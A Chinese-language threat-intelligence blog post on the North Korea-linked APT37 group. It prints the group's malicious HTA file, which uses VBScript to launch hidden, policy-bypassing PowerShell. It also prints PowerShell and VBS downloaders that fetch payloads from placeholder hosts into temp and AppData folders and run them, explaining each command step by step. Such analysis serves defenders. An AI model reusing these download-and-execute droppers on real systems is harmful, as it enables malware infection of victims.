0x00 简介
APT37,也被称为 Reaper或Group123,是一组据信与朝鲜相关的高级持续性威胁(APT)组织。这个组织被认为与朝鲜政权有联系,可能是由朝鲜政府或军方支持和控制的。APT37已经被发现在进行针对各种行业和组织的网络攻击,包括政府机构、军事承包商、技术公司和媒体等。他们的主要目标之一是获取情报、窃取技术和实施破坏性行动,以支持朝鲜政府的利益。
APT37的攻击手法可以因其目标和行动的不同而有所变化,但总体来说,他们是一个高度有组织、技术水平较高且具有灵活性的网络间谍团体。对于潜在的目标组织来说,了解APT37的攻击手法并采取相应的防御措施至关重要。
0x01 特征
APT37使用多种高级技术进行攻击,其中一个显著的特征是利用Microsoft Office漏洞(CVE-2017-0199)下载并执行恶意HTA文件。
利用Microsoft Office漏洞
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell -nop -windowstyle hidden -executionpolicy bypass -encodedcommand Base64加密命令" ,0
owFrClN0giJ.Run "cmd /c echo hta>%tmp%\webbrowser1094826604.tmp", 0
End If
Self.Close
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</head>
</html>
其中Base64加密的命令解密后会下载执行一个Windows脚本和两个恶意文件.
$c=new-object System.Net.WebClient
$t =$env:temp
$t1=$t+"\\alitmp0131.jpg"
$t2=$t+"\\alitmp0132.jpg"
$t3=$t+"\\alitmp0133.js"
try
{
echo $c.DownloadFile( "http://域名/btob_asiana/appach01.jpg",$t1)
$c.DownloadFile( "http://域名/btob_asiana/appach02.jpg",$t2)
$c.DownloadFile( "http://域名/btob_asiana/udel_ok.ipp",$t3)
wscript.exe $t3
}
catch
{
}
使用VBS和PowerShell下载恶意文件
objShell.Run "cmd.exe /k powershell.exe" & " " & "-windowstyle" & " " & "hidden" & " " & "-ExecutionPolicy Bypass" & " " & "$h='%APPDATA%/Microsoft/Windows/msvcrt32.dll'" & ";" & "$f='%APPDATA%/Microsoft/ieConv.exe'" & ";" & "$x='" & "http://" & "Url地址" & "/UserFiles/File/image/images/happy.jpg" & "';" & "$t='" & "http://" & "Url地址" & "/UserFiles/File/image/images/wwwtest.jpg" & "';" & "(" & "New-Object System.Net.WebClient" & ")" & ".DownloadFile($t,$f)" & ";" & "(" & "New-Object System.Net.WebClient" & ")" & ".DownloadFile($x,$h)" & ";" & "Start-Process $f" & ";" & "Stop-Process" & " " & "-processname" & " " & "cmd", 0
作用和命令详解:
-
objShell.Run "cmd.exe /k powershell.exe" & " " & "-windowstyle" & " " & "hidden" & " " & "-ExecutionPolicy Bypass"-
objShell.Run:使用VBScript的Wscript.Shell对象来运行一个命令。 -
"cmd.exe /k powershell.exe"
:在命令提示符中启动PowerShell。
-
/k:在执行完命令后,不关闭命令提示符窗口。
-
-
-windowstyle hidden:隐藏PowerShell窗口,使其在后台运行,不显示给用户。 -
-ExecutionPolicy Bypass:绕过执行策略,使PowerShell可以运行脚本,而不受策略限制。
-
-
设置文件路径变量
-
"$h='%APPDATA%/Microsoft/Windows/msvcrt32.dll'":设置变量$h为文件路径%APPDATA%/Microsoft/Windows/msvcrt32.dll。 -
"$f='%APPDATA%/Microsoft/ieConv.exe'":设置变量$f为文件路径%APPDATA%/Microsoft/ieConv.exe。
-
-
设置下载链接变量
-
"$x='http://Url地址/UserFiles/File/image/images/happy.jpg'":设置变量$x为URL地址http://Url地址/UserFiles/File/image/images/happy.jpg。 -
"$t='http://Url地址/UserFiles/File/image/images/wwwtest.jpg'":设置变量$t为URL地址http://Url地址/UserFiles/File/image/images/wwwtest.jpg。
-
-
下载文件
-
"(New-Object System.Net.WebClient).DownloadFile($t,$f)":使用System.Net.WebClient对象下载文件$t(wwwtest.jpg)到路径$f(ieConv.exe)。 -
"(New-Object System.Net.WebClient).DownloadFile($x,$h)":使用System.Net.WebClient对象下载文件$x(happy.jpg)到路径$h(msvcrt32.dll)。
-
-
执行下载的文件
-
Start-Process $f:启动下载到路径$f(ieConv.exe)的可执行文件。
-
-
停止命令提示符进程
-
Stop-Process -processname cmd:停止名为cmd的进程,即关闭命令提示符窗口。
-
0x02 总结
APT37是一个高度有组织、技术水平高且灵活的网络间谍团体,他们利用各种技术手段进行攻击,包括利用Microsoft Office漏洞、VBS和PowerShell脚本等。了解其攻击手法并采取相应的防御措施,对于保护潜在目标组织的网络安全至关重要。通过针对性的安全策略和工具,企业可以有效地抵御APT37的攻击,保护其关键资产和信息安全。
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
